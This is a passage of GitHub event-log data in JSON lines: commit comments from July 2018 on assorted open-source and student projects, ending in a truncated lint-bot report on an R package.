{"id":"7982247480","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"jakeajames/rootlessJB_EL"},"payload":{"comment":{"id":29747971,"position":5,"line":11,"path":"empty_list.xcodeproj/project.pbxproj","commit_id":"abd6c435db772b69694c3b22388829a208943933","created_at":"2018-07-18T11:08:40Z","updated_at":"2018-07-18T11:08:40Z","author_association":"NONE","body":"Kicloud666@gmail.com"}},"created_at":"2018-07-18T11:08:40Z"}
{"id":"7982248523","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29747972,"position":29,"line":29,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-18T11:08:52Z","updated_at":"2018-07-18T11:08:52Z","author_association":"NONE","body":"Ok, I think it's good solution too. \r\nYet it will require to prepare tarballs for each testcase, and commit tarballs in git repo? is it ok?\r\n"}},"created_at":"2018-07-18T11:08:52Z"}
{"id":"7982249185","type":"CommitCommentEvent","actor":{"login":"rav-rav"},"repo":{"name":"ctzsnooze/betaflight"},"payload":{"comment":{"id":29747973,"position":11,"line":50,"path":"src/main/sensors/gyroanalyse.c","commit_id":"226e491e119e4fb9b4f7f4aa3295f54a88516008","created_at":"2018-07-18T11:09:01Z","updated_at":"2018-07-18T11:09:01Z","author_association":"NONE","body":"Maybe this should be called FFT_BPF_Q or something. BIQUAD_Q is also defined in filters.c"}},"created_at":"2018-07-18T11:09:01Z"}
{"id":"7982249874","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"jakeajames/rootlessJB_EL"},"payload":{"comment":{"id":29747975,"position":29,"line":43,"path":"empty_list.xcodeproj/project.pbxproj","commit_id":"abd6c435db772b69694c3b22388829a208943933","created_at":"2018-07-18T11:09:11Z","updated_at":"2018-07-18T11:09:11Z","author_association":"NONE","body":"Kicloud"}},"created_at":"2018-07-18T11:09:11Z"}
{"id":"7982250649","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"neverovda/ruby_learning"},"payload":{"comment":{"id":29747976,"position":32,"line":32,"path":"lesson_1/rightTriangle.rb","commit_id":"24482c70fdd4eac4c7304f1106e96ce1dc16377c","created_at":"2018-07-18T11:09:20Z","updated_at":"2018-07-18T11:09:20Z","author_association":"NONE","body":"Твой код работает, но можно реализовать проще, если использовать функции в ruby для поиска гипотенузы/катетов, например так:\r\n```\r\nh = [a, b, c].max\r\nc1, c2 = [a, b, c].min(2)\r\n```"}},"created_at":"2018-07-18T11:09:20Z"}
{"id":"7982250955","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29747979,"position":null,"line":null,"path":null,"commit_id":"a51a046f4bd9e8e8ac87bddf8ba5050352a668a9","created_at":"2018-07-18T11:09:24Z","updated_at":"2018-07-18T11:09:24Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-301](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-301-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-18T11:09:24Z"}
{"id":"7982257350","type":"CommitCommentEvent","actor":{"login":"Lonelyzd"},"repo":{"name":"Lonelyzd/Demo"},"payload":{"comment":{"id":29747993,"position":null,"line":null,"path":null,"commit_id":"9dcb06ab539fda1c2e2860cb5cb6b45736ca098c","created_at":"2018-07-18T11:10:46Z","updated_at":"2018-07-18T11:10:46Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-18T11:10:46Z"}
{"id":"7982260895","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"jakeajames/rootlessJB_EL"},"payload":{"comment":{"id":29748003,"position":39,"line":39,"path":"empty_list/Assets.xcassets/AppIcon.appiconset/Contents.json","commit_id":"544f665531a55351a0beefe00e412a5d737ceee0","created_at":"2018-07-18T11:11:33Z","updated_at":"2018-07-18T11:11:33Z","author_association":"NONE","body":"Kicloud666@gmail.com"}},"created_at":"2018-07-18T11:11:33Z"}
{"id":"7982261544","type":"CommitCommentEvent","actor":{"login":"IvoPaunov"},"repo":{"name":"AdExNetwork/adex-node"},"payload":{"comment":{"id":29748005,"position":8,"line":46,"path":"routes/registry/exchange.js","commit_id":"fc00603dd1e2317abb4ad330edd13e5ee5f42741","created_at":"2018-07-18T11:11:41Z","updated_at":"2018-07-18T11:11:41Z","author_association":"CONTRIBUTOR","body":"Do not filter here - use mongo queries in getNotAcceptedBidsBySizeAndType and change the function name"}},"created_at":"2018-07-18T11:11:41Z"}
{"id":"7982262210","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29748008,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/company_name.rb","commit_id":"988cb6aa639bf8c2d4a494cd8ae412bc1e5b5d46","created_at":"2018-07-18T11:11:50Z","updated_at":"2018-07-18T11:11:50Z","author_association":"NONE","body":"Дастан\r\nну вот смотри, этот код конечно уже как-то работает, предыдущий то совсем не работал\r\nно есть большие НО...\r\nТЗ: \"Создать модуль, который позволит указывать название компании-производителя и получать его. Подключить модуль к классам Вагон и Поезд\"\r\nлогично предположить, что \"указывать название компании\" нужно как-то так:\r\n```ruby\r\ntrain  = Train.new(123, :cargo)\r\ntrain.company_name = 'Super Trains Company'\r\n```\r\nа запрашивать это имя у объекта видимо как-то так:\r\n```ruby\r\ntrain.company_name # => Super Trains Company\r\n```\r\nтвой код не позволит так работать"}},"created_at":"2018-07-18T11:11:50Z"}
{"id":"7982262744","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29748012,"position":10,"line":10,"path":"1/03.right_triangle.rb","commit_id":"30e205a83647c3c9a796c467cb925e26056f4af3","created_at":"2018-07-18T11:11:57Z","updated_at":"2018-07-18T11:11:57Z","author_association":"NONE","body":"Стороны могут быть не только целыми числами, но и дробными"}},"created_at":"2018-07-18T11:11:57Z"}
{"id":"7982265315","type":"CommitCommentEvent","actor":{"login":"sarahsehee"},"repo":{"name":"sarahsehee/react_lesson"},"payload":{"comment":{"id":29748019,"position":null,"line":null,"path":null,"commit_id":"294788b1e8bc1c2eb9132e8331c6b8b7730520c9","created_at":"2018-07-18T11:12:27Z","updated_at":"2018-07-18T11:12:27Z","author_association":"OWNER","body":"@HyunSeob\r\n\r\n보아랑 "}},"created_at":"2018-07-18T11:12:27Z"}
{"id":"7982266607","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29748023,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/company_name.rb","commit_id":"988cb6aa639bf8c2d4a494cd8ae412bc1e5b5d46","created_at":"2018-07-18T11:12:37Z","updated_at":"2018-07-18T11:12:37Z","author_association":"NONE","body":"особое внимание привлекло имя метода-геттера )) почему `dog_names` ?"}},"created_at":"2018-07-18T11:12:37Z"}
{"id":"7982267235","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29748025,"position":39,"line":39,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-18T11:12:43Z","updated_at":"2018-07-18T11:12:43Z","author_association":"NONE","body":"Do I understand it right that `>/dev/$serialdev` produces additional output in webGUI, some additional 'screen' in a set of screenshots where all the command output is displayed? \r\nWill the output be uploaded to OpenQA server and saved as a file on disk?\r\n\r\nOr we need to redirect the output into a file like:\r\n`    assert_script_run \"./$script 2>&1  >$script.log\";`\r\n`    save_screenshot;`\r\n`    upload_logs \"$script.log\";`\r\n\r\n"}},"created_at":"2018-07-18T11:12:43Z"}
{"id":"7982267272","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29748026,"position":16,"line":16,"path":"1/03.right_triangle.rb","commit_id":"30e205a83647c3c9a796c467cb925e26056f4af3","created_at":"2018-07-18T11:12:43Z","updated_at":"2018-07-18T11:12:43Z","author_association":"NONE","body":"круто, а можно еще круче:\r\na, b = triangle.min(2)"}},"created_at":"2018-07-18T11:12:43Z"}
{"id":"7982271823","type":"CommitCommentEvent","actor":{"login":"kicloud"},"repo":{"name":"jakeajames/rootlessJB_EL"},"payload":{"comment":{"id":29748048,"position":313,"line":313,"path":"empty_list.xcodeproj/project.pbxproj","commit_id":"544f665531a55351a0beefe00e412a5d737ceee0","created_at":"2018-07-18T11:13:38Z","updated_at":"2018-07-18T11:13:38Z","author_association":"NONE","body":"Kicloud666@gmail.com"}},"created_at":"2018-07-18T11:13:38Z"}
{"id":"7982275071","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29748061,"position":15,"line":15,"path":"1/04.quadratic.rb","commit_id":"30e205a83647c3c9a796c467cb925e26056f4af3","created_at":"2018-07-18T11:14:22Z","updated_at":"2018-07-18T11:14:22Z","author_association":"NONE","body":"Math.sqrt(d) дважды вычисляется, нужно сделать чтобы вычисление было один раз"}},"created_at":"2018-07-18T11:14:22Z"}
{"id":"7982281565","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29748073,"position":null,"line":null,"path":null,"commit_id":"facd6bf1728ff4bb683d5236a074f596b59e1b19","created_at":"2018-07-18T11:15:51Z","updated_at":"2018-07-18T11:15:51Z","author_association":"OWNER","body":"Fixes #17"}},"created_at":"2018-07-18T11:15:51Z"}
{"id":"7982287943","type":"CommitCommentEvent","actor":{"login":"IvoPaunov"},"repo":{"name":"AdExNetwork/adex-node"},"payload":{"comment":{"id":29748085,"position":8,"line":46,"path":"routes/registry/exchange.js","commit_id":"fc00603dd1e2317abb4ad330edd13e5ee5f42741","created_at":"2018-07-18T11:17:14Z","updated_at":"2018-07-18T11:17:14Z","author_association":"CONTRIBUTOR","body":"Also for the old units/slots/bids without tags - assume that there in no filter by tags for them"}},"created_at":"2018-07-18T11:17:14Z"}
{"id":"7982288454","type":"CommitCommentEvent","actor":{"login":"Scarlet-Smallwhite"},"repo":{"name":"Scarlet-Smallwhite/lzs"},"payload":{"comment":{"id":29748087,"position":null,"line":null,"path":null,"commit_id":"4919ef3bbfe245894386a8043867a2f8bd41b2e7","created_at":"2018-07-18T11:17:21Z","updated_at":"2018-07-18T11:17:21Z","author_association":"OWNER","body":"这是我第一次用下载的软件上传东西"}},"created_at":"2018-07-18T11:17:21Z"}
{"id":"7982288963","type":"CommitCommentEvent","actor":{"login":"swimclan"},"repo":{"name":"swimclan/gdax-candles"},"payload":{"comment":{"id":29748088,"position":null,"line":null,"path":null,"commit_id":"f2d1c8947b895b6fef393941b9fd1688d46af1f8","created_at":"2018-07-18T11:17:27Z","updated_at":"2018-07-18T11:17:27Z","author_association":"OWNER","body":"Thanks @Flippo24 how about the version in package.json.  Can you bump that to 1.5.3 as well.  Sorry just want to keep the merge clean and publishable to NPM"}},"created_at":"2018-07-18T11:17:27Z"}
{"id":"7982293735","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29748096,"position":4,"line":1329,"path":"src/parser.c","commit_id":"61c710cae6b0c32d18abf6ef5b568f6f8db1ee41","created_at":"2018-07-18T11:18:34Z","updated_at":"2018-07-18T11:18:34Z","author_association":"NONE","body":"I think this needs to be:\r\n\r\n```c\r\nif (version_directive_ref == NULL) {\r\n        yaml_free(version_directive);\r\n}\r\n\r\nBecause if `version_directive_ref` is non-NULL, it does: `*version_directive_ref = version_directive;`.\r\n```"}},"created_at":"2018-07-18T11:18:34Z"}
{"id":"7982294480","type":"CommitCommentEvent","actor":{"login":"Zhunya"},"repo":{"name":"sqlcollaborative/dbatools"},"payload":{"comment":{"id":29748098,"position":null,"line":null,"path":null,"commit_id":"b61ae247ad25cdb72549f942e572e400350dafee","created_at":"2018-07-18T11:18:44Z","updated_at":"2018-07-18T11:18:44Z","author_association":"CONTRIBUTOR","body":"Oh No! 4 `InnerExceptions`! some time ago our team said `NO` to `InnerExceprion` =)"}},"created_at":"2018-07-18T11:18:44Z"}
{"id":"7982297495","type":"CommitCommentEvent","actor":{"login":"Elkasitu"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29748106,"position":8,"line":553,"path":"odoo/addons/base/ir/ir_model.py","commit_id":"ca44dff7d2cb4d60c61a24bdf3d306cde79c64b4","created_at":"2018-07-18T11:19:28Z","updated_at":"2018-07-18T11:19:28Z","author_association":"NONE","body":"`False`"}},"created_at":"2018-07-18T11:19:28Z"}
{"id":"7982299188","type":"CommitCommentEvent","actor":{"login":"alfredwassermann"},"repo":{"name":"jsxgraph/jsxgraph"},"payload":{"comment":{"id":29748112,"position":null,"line":null,"path":null,"commit_id":"fd7d03f071a37c2dfb59a90e358a7ad495113a30","created_at":"2018-07-18T11:19:52Z","updated_at":"2018-07-18T11:19:52Z","author_association":"MEMBER","body":"The hit event works in all of my test devices. \r\nBut I may have an explanation why no hit events are fired. Please correct me if I'm wrong:\r\nWhat I saw in the [video](https://www.youtube.com/watch?v=3aa2mkLnwrw&feature=youtu.be) was that there were touches directly onto the elements. This means, the JavaScript events `touchstart` and `touchmove` are fired. Since `touchstart` is fired directly over an JSXGraph element, this element is taken to be the element which will be dragged by subsequent `touchmove` events, But for dragged elements no `hit` events are fired.\r\nWith mouse pointer the handling seems to be different since the sensitive areas are smaller.\r\n\r\nOf course, we can discuss if the `hit` event should also be fired for dragged elements.\r\nBest wishes,\r\nAlfred\r\n"}},"created_at":"2018-07-18T11:19:52Z"}
{"id":"7982302971","type":"CommitCommentEvent","actor":{"login":"coriolinus"},"repo":{"name":"exercism/rust"},"payload":{"comment":{"id":29748118,"position":13,"line":111,"path":"exercises/grep/tests/grep.rs","commit_id":"e32fe94c77bc0893d188b5ef662a766c8c5cad16","created_at":"2018-07-18T11:20:43Z","updated_at":"2018-07-18T11:20:43Z","author_association":"CONTRIBUTOR","body":"typo: \"standart\" -> \"standard\""}},"created_at":"2018-07-18T11:20:43Z"}
{"id":"7982306340","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29748122,"position":17,"line":17,"path":"1/04.quadratic.rb","commit_id":"30e205a83647c3c9a796c467cb925e26056f4af3","created_at":"2018-07-18T11:21:28Z","updated_at":"2018-07-18T11:21:28Z","author_association":"NONE","body":"А здесь ошибка, у тебя x1 == x2 не посчитаются, так как первое условие не выполнится (и в принципе оба будут равны nil). Их нужно просто убрать"}},"created_at":"2018-07-18T11:21:28Z"}
{"id":"7982306432","type":"CommitCommentEvent","actor":{"login":"Elkasitu"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29748124,"position":17,"line":562,"path":"odoo/addons/base/ir/ir_model.py","commit_id":"ca44dff7d2cb4d60c61a24bdf3d306cde79c64b4","created_at":"2018-07-18T11:21:29Z","updated_at":"2018-07-18T11:21:29Z","author_association":"NONE","body":"`depends`"}},"created_at":"2018-07-18T11:21:29Z"}
{"id":"7982311147","type":"CommitCommentEvent","actor":{"login":"MrPlusGH"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29748133,"position":null,"line":null,"path":null,"commit_id":"f61c97a74c9e367f0020a23564f25940fa6d30c1","created_at":"2018-07-18T11:22:35Z","updated_at":"2018-07-18T11:22:35Z","author_association":"CONTRIBUTOR","body":"Careful, you forgot one line which excludes coins with no autotrade!"}},"created_at":"2018-07-18T11:22:35Z"}
{"id":"7982313214","type":"CommitCommentEvent","actor":{"login":"ldallolio-irt"},"repo":{"name":"Alneos/vega"},"payload":{"comment":{"id":29748141,"position":null,"line":null,"path":null,"commit_id":"5691b71f9df083c6d646d32c4227ed901354b8bc","created_at":"2018-07-18T11:23:03Z","updated_at":"2018-07-18T11:23:03Z","author_association":"MEMBER","body":"You are right on both points, I would like to generate and deploy the doxygen documentation automatically and I will make it look nice, but I saved it for later ;) I will rename the param functions, thanks for the hint!"}},"created_at":"2018-07-18T11:23:03Z"}
{"id":"7982314141","type":"CommitCommentEvent","actor":{"login":"1federico1"},"repo":{"name":"keunwoochoi/transfer_learning_music"},"payload":{"comment":{"id":29748143,"position":208,"line":208,"path":"1. feature extraction for 6 tasks.ipynb","commit_id":"77dd66d77b5d4990ac1e493e2d69d589d6c85da1","created_at":"2018-07-18T11:23:15Z","updated_at":"2018-07-18T11:23:15Z","author_association":"NONE","body":"Ok, thank you for the kindly response. I figured out how to handle the error myself, in the next days maybe I'll make a pull with the modification if you are interested."}},"created_at":"2018-07-18T11:23:15Z"}
{"id":"7982343022","type":"CommitCommentEvent","actor":{"login":"ohlookitsderpy"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29748224,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T11:29:28Z","updated_at":"2018-07-18T11:29:28Z","author_association":"NONE","body":"nice token"}},"created_at":"2018-07-18T11:29:28Z"}
{"id":"7982343251","type":"CommitCommentEvent","actor":{"login":"ShadowRZ"},"repo":{"name":"KenOokamiHoro/it_have_not_get_a_name_yet"},"payload":{"comment":{"id":29748225,"position":23,"line":21,"path":"security_essentials/about_root.md","commit_id":"7a793db9c0420b0e8185e5a40c0f6d248d2bb510","created_at":"2018-07-18T11:29:31Z","updated_at":"2018-07-18T11:29:31Z","author_association":"COLLABORATOR","body":"回退提交，交互暂存，撤掉错误的变更，提交，**变基**，推送  \r\n（一会我会这么干的）"}},"created_at":"2018-07-18T11:29:31Z"}
{"id":"7982344601","type":"CommitCommentEvent","actor":{"login":"Chetan07j"},"repo":{"name":"tothimre/jsonschema-formatter"},"payload":{"comment":{"id":29748227,"position":null,"line":null,"path":null,"commit_id":"eb6bf5a063eff1e46b157aef32f3fde8b493bd1d","created_at":"2018-07-18T11:29:50Z","updated_at":"2018-07-18T11:29:50Z","author_association":"NONE","body":"Hello,\r\nIt's not typo error.\r\nIf you have gone through README file, I have defined some schema for validation, and I gave some input,\r\nand then called validation function, so it gave \"name is missing error\"\r\nso it needs to be same what I added."}},"created_at":"2018-07-18T11:29:50Z"}
{"id":"7982354897","type":"CommitCommentEvent","actor":{"login":"SebastianGB"},"repo":{"name":"DLR-RM/RAFCON"},"payload":{"comment":{"id":29748246,"position":null,"line":null,"path":null,"commit_id":"0229b155bf529cc824c079ebf65b6092c2a22057","created_at":"2018-07-18T11:32:07Z","updated_at":"2018-07-18T11:32:07Z","author_association":"MEMBER","body":"This is nice! So we won't have to change the link every time!"}},"created_at":"2018-07-18T11:32:07Z"}
{"id":"7982355870","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29748248,"position":null,"line":null,"path":null,"commit_id":"ca6b604d4d85c445f855b8bd4397f66e66bbeaca","created_at":"2018-07-18T11:32:19Z","updated_at":"2018-07-18T11:32:19Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:333:10:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/berekenLSVIbasis.R#L333) *style:* **Commented code should be removed.**\n```r\n<U+200B>        #Index_min_min < 0\n         ^~~~~~~~~~~~~~~~~\n```\n[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/ca6b604d4d85c445f855b8bd4397f66e66bbeaca/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en 